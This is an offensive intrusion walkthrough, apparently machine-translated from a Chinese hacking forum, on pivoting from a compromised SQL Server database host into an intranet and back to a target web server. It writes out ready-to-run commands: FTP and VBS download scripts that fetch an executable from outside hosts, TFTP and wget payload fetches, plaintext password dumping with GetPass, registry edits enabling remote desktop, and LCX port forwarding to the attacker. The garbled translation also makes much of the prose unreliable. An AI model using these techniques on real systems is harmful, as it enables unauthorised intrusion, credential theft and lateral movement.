Station Library to take the intranet server to the target server

0x00 Power Environment
This is an oil to ask me how to take off my trousers ~ ~ ~
And then try to get right.
Look at the bottom of the mouth, opened 80 and 3389
Windows 2003 x86

Since the pants off, you can imagine there must be a database

From the figure that the example is the station library separation, then I foolishly took SA to execute the Add user command
The result is not even up ~ ~ ~ must not even on Satan!!!
Well, here are a few ideas:
First, regardless of this configuration file, directly on the original server to right
Second, use SA to take the intranet server and then win the original server
First try the first one ~ ~

power on the original server of 0x01
No commonly used third-party software, only from overflow.
The tragedy is that basically all overflows are like this, either being killed (Mccafés janitor), or not being executed.

Well, lost a lpk.dll up ~ ~ ~ Continue the following ideas.

0x02 The intranet server first

Take the intranet server altogether also has a line of thought ~ ~ ~
First, do not take down the server, directly read the hash, and then decrypt, to see if the Intranet machine is shared with the password ~ ~ ~
Second, use the LCX forwarding tool to seize the server, and then collect the information in the server
But the above two ideas need one thing, is to upload files to the database server.
How do I upload files to the server?
There are a lot of ideas, I will introduce the common three kinds of
First, using the cmd command to invoke FTP (or tftp) to upload files (1433 principle of horse-passing)
Second, using SQL statements to create temporary tables to write data and then export the data
Third, VBS script upload
First of all (maybe the oil will ask why do not use the echo command to write files to the server ~~~~echo can only write a sentence and encounter > or >> symbol will automatically stop, so do not use echo Write ~ ~)

First build the FTP server on this machine
The configuration is as follows:
Select a folder with files in the folder that need to be uploaded 1.txt

Use cmd to write a command, a sentence of the execution.
echo Open 223.85.31.141>>test.txt Login FTP server, 223.85.31.141 for native IP

Echo Test>>test.txt Write user name

echo Test>>test.txt Write password

echo bin>>test.txt equivalent to enter, that is the beginning of the meaning

echo get 1.txt>>test.txt download 1.txt in FTP server

echo Bye>>test.txt Close the FTP server

CMD execution is complete.
Then use the type command to view the file information in the Test.txt
Type Test.txt
---------------------------------------------------------------------------------------------------------------
Open 223.85.31.141
Test
Test
Bin
Get 1.txt

Bye

Successful Write
The following is a call to the FTP command to download execute these commands ~ ~ ~

The test results in this machine are as follows:
--------------------------------------------------------------------------------------------------------------- -------------
Ftp-s:test.txt
Ftp> Open 223.85.31.141
Connect to 223.85.31.141.
Welcome to SUS FTP Server
User (223.85.31.141: (none)):
331 Password required for test

Logged on
Ftp> bin
Type set to I
Ftp> Get 1.txt
Port Command Successful
Opening data channel for file transfer.
226 Transfer Complete
ftp: Received 11 bytes, spents 0.00 seconds 11.00 kilobytes per second.
Ftp> bye
Bye
--------------------------------------------------------------------------------------------------------------- ------


The tragedy is that when executed on the server, it is the following command:
--------------------------------------------------------------------------------------------------------------- ------
' FTP ' is not an internal or external command, nor is it a running program
or batch file.
--------------------------------------------------------------------------------------------------------------- ------
The reason for this is probably that Ftp.exe was removed, or there was something about the cow B.

Here's the second idea is to write and export using SQL statements ~ ~ ~
Originally also want to write the SQL statements stored procedures, I am more lazy, I would like to find on the internet there are wood directly with the script to complete the file upload.

Don't say it's good luck. Find a Sa-upfile 1.0 (SA permission to upload files)
Use environment: SQL2000,SA permission, commonly used to raise the right to extend existence.
Principle: Binary import and export using Textcopy.
All right, try it.

Really good use, decisive success ~~~~~
It seems that rookie is really a rookie, this is the legend of the Saupfile formation ~ ~ ~
But the principle is to look at this article:
How to upload a file remotely via SQL Server implementation

Here is still added with VBS download file and TFTP download ~ ~ As above, once the administrator deletes Ftp.exe
You won't be able to achieve the purpose of uploading
VBSDownload File
But the power of the script is reflected here ~ ~ ~
Script uploads require only adodb.stream support, and Windows systems are supported by default.
The upload script is as follows (also CMD executes the following command):
echo Set xpost = CreateObject (^ "microsoft.xmlhttp^"): Xpost.open ^ "get^", ^ "http://f4ck.yueyan.net/yueyan.exe^", 0: Xpost.send (): Set sget = CreateObject (^ "ADODB. stream^ "): Sget.mode = 3:sget.type = 1:sget.open (): Sget.write (xpost.responsebody): sget.savetofile ^" C:\yueyan.exe^ ", 2 >down.vbs

Then execute cscript down.vbs to complete the download.

TftpDownload:
TFTP download should be the easiest way to upload this, why I will last mention, and I do not recommend TFTP upload.
Just to introduce you to the line.
The reason is that TFTP is based on the UDP protocol, and anyone who understands the UDP and TC/IP protocols should know that the UDP protocol is designed to transmit a small amount of data. QQ Chat message is based on this protocol. So can only transfer small files, of course, transmission of a wget or no pressure ~ ~ ~ ~ But sometimes there will be some anti-virus software will block the transfer process ~ ~ So not recommended.

Talk about the use of methods: first of all, now this machine everyone TFTP server


And then execute the command on the server, and one is enough.
Tftp-i <your ip> Get Yueyan.exe Path/yueyan.exe
For example I want to download Yueyan.exe to C packing directory, just execute
Tftp–i 110.110.110.110 Get Yueyan.exe C:/yueyan.exe
As simple as this, if the path is not added by default is system32 this directory.


If you download more files, it is recommended to upload a Wget.exe
The command is as follows:

Wgethttp://f4ck.yueyan.com/yueyan.exe

It's convenient to upload other files.

First, use GetPass.exe to fetch the plaintext password directly.
--------------------------------------------------------------------------------------------------------------- ---------------
Username:administrator
Logondomain:win-qub8glt3hkb
password:000
--------------------------------------------------------------------------------------------------------------- -----------------
If you want to ~~~~000 this, try it on the original server.


I'm not going to make it, okay, I admit I stepped on a bum today.
This is a good solution. See if the server is turned on 3389
Use Netstat–an to view the wood is open 3389, and use CMD to view the remote terminal:
REG query Hklm\system\currentcontrolset\control\terminal "" Server\winstations\rdp-tcp/v portnumber
Due to system privileges, direct command can be opened
Open 3389:
REG ADD hklm\system\currentcontrolset\control\terminal "" Server/v fdenytsconnections/t reg_dword/d 0/f

After the opening of the direct forwarding is OK ~ ~

Native Execution Lcx-listen 51 33891
Server execution Lcx–slave 223.85.31.141 51 127.0.0.1 3389
Connection 127.0.0.1:33891


OK ~ ~ ~ finally went inside ~ ~ ~

0x03 from the intranet slowly to take the original server
Take down a server and now sacrifice my artifact ~~~h-scan



And the artifact two ~~~sqltool
The right to mention ~ ~ ~
Crazy to take the server ~ ~ ~ Take the server is why? Gather information.
Take a server, grab a server password ~ ~ ~
Get several passwords ~ ~ ~
And then log on to this machine.
Successful landing



Actually take this server does not have the actual reason, is wants to mention the Power ~ ~ ~

Station Library to take the intranet server to the target server